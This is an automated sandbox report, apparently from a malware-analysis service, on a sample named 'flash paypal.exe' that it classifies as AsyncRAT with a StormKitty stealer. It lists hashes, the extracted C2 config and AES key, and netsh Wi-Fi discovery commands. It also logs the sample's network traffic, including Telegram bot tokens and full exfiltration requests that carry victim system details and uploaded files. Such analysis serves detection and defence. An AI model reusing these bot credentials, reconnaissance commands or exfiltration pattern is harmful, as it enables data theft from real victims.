Analysis

  • max time kernel
    111s
  • max time network
    96s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-08-2024 12:05

General

  • Target

    flash paypal.exe

  • Size

    175KB

  • MD5

    0d421a91631c3c2cae6533bd32e2e595

  • SHA1

    9113e54ec2b864a4845cb14930aa60666e1a596a

  • SHA256

    e1df166da9ba07ad1a5b1a105eac585f04ea67a023cca16f54bdbfa97bb39dd2

  • SHA512

    1d677726303cb667c01d8d340f5632667c1929dd5965e7008eab2d1755a02823cff1f583ece6987085ed1eb28429afa2592e5f0b6b63a3bb8e9c17d77c69d8ad

  • SSDEEP

    3072:Ue8oX8Sb5KcXrtkkXmf/bDsvqtU+lLToChAP0UZ0b2gTIwAqE+Wpor:9Xtb5KcXr7XmfgqtjhAxZ0b2h

Malware Config

Extracted

Family

asyncrat

Botnet

Default

C2

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendMessage?chat_id=5901231421

Mutex

AsyncMutex_6SI8OkPnk

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain
1
VIfxfqryUTyZUBGDCBAvbYVYIsexIM7Z

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops desktop.ini file(s) 8 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\flash paypal.exe
    "C:\Users\Admin\AppData\Local\Temp\flash paypal.exe"
    1⤵
    • Drops desktop.ini file(s)
    • System Location Discovery: System Language Discovery
    • Checks processor information in registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2768
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
      2⤵
      • System Location Discovery: System Language Discovery
      • System Network Configuration Discovery: Wi-Fi Discovery
      • Suspicious use of WriteProcessMemory
      PID:3788
      • C:\Windows\SysWOW64\chcp.com
        chcp 65001
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1704
      • C:\Windows\SysWOW64\netsh.exe
        netsh wlan show profile
        3⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Wi-Fi Discovery
        PID:1792
      • C:\Windows\SysWOW64\findstr.exe
        findstr All
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5000
    • C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4556
      • C:\Windows\SysWOW64\chcp.com
        chcp 65001
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3056
      • C:\Windows\SysWOW64\netsh.exe
        netsh wlan show networks mode=bssid
        3⤵
        • Event Triggered Execution: Netsh Helper DLL
        • System Location Discovery: System Language Discovery
        PID:1376

Network

  • flag-us
    DNS
    g.bing.com
    Remote address:
    8.8.8.8:53
    Request
    g.bing.com
    IN A
    Response
    g.bing.com
    IN CNAME
    g-bing-com.dual-a-0034.a-msedge.net
    g-bing-com.dual-a-0034.a-msedge.net
    IN CNAME
    dual-a-0034.a-msedge.net
    dual-a-0034.a-msedge.net
    IN A
    13.107.21.237
    dual-a-0034.a-msedge.net
    IN A
    204.79.197.237
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid=
    Remote address:
    13.107.21.237:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MUID=3E38253D3E8366C61D1E31EE3F636711; domain=.bing.com; expires=Sun, 31-Aug-2025 12:05:32 GMT; path=/; SameSite=None; Secure; Priority=High;
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 101824CFA4664D1587A9C738291B0E1C Ref B: LON04EDGE1112 Ref C: 2024-08-06T12:05:32Z
    date: Tue, 06 Aug 2024 12:05:32 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid=
    Remote address:
    13.107.21.237:443
    Request
    GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=3E38253D3E8366C61D1E31EE3F636711
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    set-cookie: MSPTC=53ETKp20L6LXwloaGkW2Q6InFDb4ZHkgrsOKo2ragys; domain=.bing.com; expires=Sun, 31-Aug-2025 12:05:33 GMT; path=/; Partitioned; secure; SameSite=None
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 2EC3C9E8D60D43A7B73ACBCFDF24B338 Ref B: LON04EDGE1112 Ref C: 2024-08-06T12:05:33Z
    date: Tue, 06 Aug 2024 12:05:32 GMT
  • flag-us
    GET
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid=
    Remote address:
    13.107.21.237:443
    Request
    GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid= HTTP/2.0
    host: g.bing.com
    accept-encoding: gzip, deflate
    user-agent: WindowsShellClient/9.0.40929.0 (Windows)
    cookie: MUID=3E38253D3E8366C61D1E31EE3F636711; MSPTC=53ETKp20L6LXwloaGkW2Q6InFDb4ZHkgrsOKo2ragys
    Response
    HTTP/2.0 204
    cache-control: no-cache, must-revalidate
    pragma: no-cache
    expires: Fri, 01 Jan 1990 00:00:00 GMT
    strict-transport-security: max-age=31536000; includeSubDomains; preload
    access-control-allow-origin: *
    x-cache: CONFIG_NOCACHE
    accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
    x-msedge-ref: Ref A: 943E47DE7F0748D1847EF97318C22F6E Ref B: LON04EDGE1112 Ref C: 2024-08-06T12:05:33Z
    date: Tue, 06 Aug 2024 12:05:32 GMT
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
  • flag-us
    DNS
    237.21.107.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    237.21.107.13.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    77.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    77.190.18.2.in-addr.arpa
    IN PTR
    Response
    77.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-77deploystaticakamaitechnologiescom
  • flag-us
    DNS
    71.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    71.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    57.169.31.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    57.169.31.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    icanhazip.com
    flash paypal.exe
    Remote address:
    8.8.8.8:53
    Request
    icanhazip.com
    IN A
    Response
    icanhazip.com
    IN A
    104.16.185.241
    icanhazip.com
    IN A
    104.16.184.241
  • flag-us
    GET
    http://icanhazip.com/
    flash paypal.exe
    Remote address:
    104.16.185.241:80
    Request
    GET / HTTP/1.1
    Host: icanhazip.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Tue, 06 Aug 2024 12:05:46 GMT
    Content-Type: text/plain
    Content-Length: 14
    Connection: keep-alive
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET
    Set-Cookie: __cf_bm=x6_t2LFft3ez9L.NRojrNTBpbot35wDJfqAkgoc3p_g-1722945946-1.0.1.1-a5LIn.Z4Vi6D8XhSy5ouV6jtICoJ8H6ikH.G709jdsrHXrKJMjerMJEgfoKWDCjguKOK.LtkjtZIUFd46kl0Kg; path=/; expires=Tue, 06-Aug-24 12:35:46 GMT; domain=.icanhazip.com; HttpOnly
    Server: cloudflare
    CF-RAY: 8aeee5a7afb593ee-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    api.mylnikov.org
    flash paypal.exe
    Remote address:
    8.8.8.8:53
    Request
    api.mylnikov.org
    IN A
    Response
    api.mylnikov.org
    IN A
    172.67.196.114
    api.mylnikov.org
    IN A
    104.21.44.66
  • flag-us
    GET
    https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=c2:7f:26:b6:5d:9f
    flash paypal.exe
    Remote address:
    172.67.196.114:443
    Request
    GET /geolocation/wifi?v=1.1&bssid=c2:7f:26:b6:5d:9f HTTP/1.1
    Host: api.mylnikov.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Tue, 06 Aug 2024 12:05:47 GMT
    Content-Type: application/json; charset=utf8
    Content-Length: 88
    Connection: keep-alive
    Access-Control-Allow-Origin: *
    Cache-Control: max-age=2678400
    CF-Cache-Status: MISS
    Last-Modified: Tue, 06 Aug 2024 12:05:47 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QqC4EatN1cPxIuV5jOMi8I%2BB0XpCEDgycYllgY%2BPR2apFQQpTx69oZZ00dIRtAiJPUeYjTo%2B4Kp2XNK4Q8y%2FiRHapbVHd18Rw7E%2BTntmhb%2BUMotIVpPCeQFu5TZUaO%2F9ZJfg"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Strict-Transport-Security: max-age=0; preload
    X-Content-Type-Options: nosniff
    Server: cloudflare
    CF-RAY: 8aeee5a9ff9c3d8e-LHR
    alt-svc: h3=":443"; ma=86400
  • flag-us
    DNS
    api.telegram.org
    flash paypal.exe
    Remote address:
    8.8.8.8:53
    Request
    api.telegram.org
    IN A
    Response
    api.telegram.org
    IN A
    149.154.167.220
  • flag-nl
    GET
    https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendMessage?chat_id=5901231421&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-08-06%2012:05:34%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20HVDPCYGS%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.232%0AExternal%20IP:%20194.110.13.70%0ABSSID:%20c2:7f:26:b6:5d:9f%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True
    flash paypal.exe
    Remote address:
    149.154.167.220:443
    Request
    GET /bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendMessage?chat_id=5901231421&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-08-06%2012:05:34%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20HVDPCYGS%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.232%0AExternal%20IP:%20194.110.13.70%0ABSSID:%20c2:7f:26:b6:5d:9f%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1
    Host: api.telegram.org
    Connection: Keep-Alive
    Response
    HTTP/1.1 400 Bad Request
    Server: nginx/1.18.0
    Date: Tue, 06 Aug 2024 12:05:47 GMT
    Content-Type: application/json
    Content-Length: 137
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-nl
    GET
    https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendMessage?chat_id=5901231421&text=%F0%9F%93%81%20Uploading%20Log%20Folders...
    flash paypal.exe
    Remote address:
    149.154.167.220:443
    Request
    GET /bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendMessage?chat_id=5901231421&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1
    Host: api.telegram.org
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Tue, 06 Aug 2024 12:05:47 GMT
    Content-Type: application/json
    Content-Length: 252
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    241.185.16.104.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    241.185.16.104.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    114.196.67.172.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    114.196.67.172.in-addr.arpa
    IN PTR
    Response
  • flag-nl
    POST
    https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendDocument?chat_id=5901231421
    flash paypal.exe
    Remote address:
    149.154.167.220:443
    Request
    POST /bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendDocument?chat_id=5901231421 HTTP/1.1
    Content-Type: multipart/form-data; boundary="9f979af1-0ea3-45af-8c11-f317451e37bd"
    Host: api.telegram.org
    Content-Length: 82941
    Expect: 100-continue
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Tue, 06 Aug 2024 12:05:48 GMT
    Content-Type: application/json
    Content-Length: 468
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Allow-Methods: GET, POST, OPTIONS
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    220.167.154.149.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    220.167.154.149.in-addr.arpa
    IN PTR
    Response
  • flag-nl
    POST
    https://api.telegram.org/bot5292408150:AAHAPbTr2Jc9L4hgsfkDkvfw_hISg6lPMMI/sendDocument?chat_id=5038570348
    flash paypal.exe
    Remote address:
    149.154.167.220:443
    Request
    POST /bot5292408150:AAHAPbTr2Jc9L4hgsfkDkvfw_hISg6lPMMI/sendDocument?chat_id=5038570348 HTTP/1.1
    Content-Type: multipart/form-data; boundary="6c747961-d8b9-49f8-8467-dc7d04413380"
    Host: api.telegram.org
    Content-Length: 82941
    Expect: 100-continue
    Response
    HTTP/1.1 401 Unauthorized
    Server: nginx/1.18.0
    Date: Tue, 06 Aug 2024 12:05:50 GMT
    Content-Type: application/json
    Content-Length: 58
    Connection: keep-alive
    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
    Access-Control-Allow-Origin: *
    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
  • flag-us
    DNS
    183.59.114.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    183.59.114.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    56.126.166.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    56.126.166.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    73.190.18.2.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    73.190.18.2.in-addr.arpa
    IN PTR
    Response
    73.190.18.2.in-addr.arpa
    IN PTR
    a2-18-190-73deploystaticakamaitechnologiescom
  • flag-us
    DNS
    34.58.20.217.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    34.58.20.217.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    48.229.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    48.229.111.52.in-addr.arpa
    IN PTR
    Response
  • 13.107.21.237:443
    https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid=
    tls, http2
    2.0kB
    9.3kB
    21
    19

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid=

    HTTP Response

    204

    HTTP Request

    GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=ec769c137b1541179d1b889a1c75761d&localId=w:82828431-2DDB-D3A4-0A67-5CF56E102AD4&deviceId=6755468654845740&anid=

    HTTP Response

    204
  • 104.16.185.241:80
    http://icanhazip.com/
    http
    flash paypal.exe
    247 B
    668 B
    4
    3

    HTTP Request

    GET http://icanhazip.com/

    HTTP Response

    200
  • 172.67.196.114:443
    https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=c2:7f:26:b6:5d:9f
    tls, http
    flash paypal.exe
    722 B
    4.2kB
    7
    8

    HTTP Request

    GET https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=c2:7f:26:b6:5d:9f

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendMessage?chat_id=5901231421&text=%F0%9F%93%81%20Uploading%20Log%20Folders...
    tls, http
    flash paypal.exe
    2.5kB
    7.5kB
    11
    13

    HTTP Request

    GET https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendMessage?chat_id=5901231421&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-08-06%2012:05:34%20PM%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20Admin%0ACompName:%20HVDPCYGS%0ALanguage:%20%F0%9F%87%BA%F0%9F%87%B8%20en-US%0AAntivirus:%20Not%20installed%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%2012th%20Gen%20Intel(R)%20Core(TM)%20i5-12400%0AGPU:%20Microsoft%20Basic%20Display%20Adapter%0ARAM:%2016154MB%0AHWID:%20Unknown%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x720%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%2010.127.0.1%0AInternal%20IP:%2010.127.1.232%0AExternal%20IP:%20194.110.13.70%0ABSSID:%20c2:7f:26:b6:5d:9f%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True

    HTTP Response

    400

    HTTP Request

    GET https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendMessage?chat_id=5901231421&text=%F0%9F%93%81%20Uploading%20Log%20Folders...

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendDocument?chat_id=5901231421
    tls, http
    flash paypal.exe
    87.4kB
    9.0kB
    74
    55

    HTTP Request

    POST https://api.telegram.org/bot6381067446:AAEZEWH8wbF7Q1Kou81_S0sE6VwJZGJKneM/sendDocument?chat_id=5901231421

    HTTP Response

    200
  • 149.154.167.220:443
    https://api.telegram.org/bot5292408150:AAHAPbTr2Jc9L4hgsfkDkvfw_hISg6lPMMI/sendDocument?chat_id=5038570348
    tls, http
    flash paypal.exe
    106.5kB
    7.9kB
    97
    33

    HTTP Request

    POST https://api.telegram.org/bot5292408150:AAHAPbTr2Jc9L4hgsfkDkvfw_hISg6lPMMI/sendDocument?chat_id=5038570348

    HTTP Response

    401
  • 127.0.0.1:8808
    flash paypal.exe
  • 127.0.0.1:6606
    flash paypal.exe
  • 127.0.0.1:7707
    flash paypal.exe
  • 127.0.0.1:7707
    flash paypal.exe
  • 127.0.0.1:8808
    flash paypal.exe
  • 127.0.0.1:8808
    flash paypal.exe
  • 127.0.0.1:6606
    flash paypal.exe
  • 127.0.0.1:8808
    flash paypal.exe
  • 127.0.0.1:7707
    flash paypal.exe
  • 127.0.0.1:6606
    flash paypal.exe
  • 127.0.0.1:8808
    flash paypal.exe
  • 127.0.0.1:7707
    flash paypal.exe
  • 127.0.0.1:6606
    flash paypal.exe
  • 127.0.0.1:8808
    flash paypal.exe
  • 8.8.8.8:53
    g.bing.com
    dns
    56 B
    151 B
    1
    1

    DNS Request

    g.bing.com

    DNS Response

    13.107.21.237
    204.79.197.237

  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    132 B
    90 B
    2
    1

    DNS Request

    8.8.8.8.in-addr.arpa

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    77.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    77.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    237.21.107.13.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    237.21.107.13.in-addr.arpa

  • 8.8.8.8:53
    71.159.190.20.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    71.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    57.169.31.20.in-addr.arpa
    dns
    71 B
    157 B
    1
    1

    DNS Request

    57.169.31.20.in-addr.arpa

  • 8.8.8.8:53
    icanhazip.com
    dns
    flash paypal.exe
    59 B
    91 B
    1
    1

    DNS Request

    icanhazip.com

    DNS Response

    104.16.185.241
    104.16.184.241

  • 8.8.8.8:53
    api.mylnikov.org
    dns
    flash paypal.exe
    62 B
    94 B
    1
    1

    DNS Request

    api.mylnikov.org

    DNS Response

    172.67.196.114
    104.21.44.66

  • 8.8.8.8:53
    api.telegram.org
    dns
    flash paypal.exe
    62 B
    78 B
    1
    1

    DNS Request

    api.telegram.org

    DNS Response

    149.154.167.220

  • 8.8.8.8:53
    241.185.16.104.in-addr.arpa
    dns
    73 B
    135 B
    1
    1

    DNS Request

    241.185.16.104.in-addr.arpa

  • 8.8.8.8:53
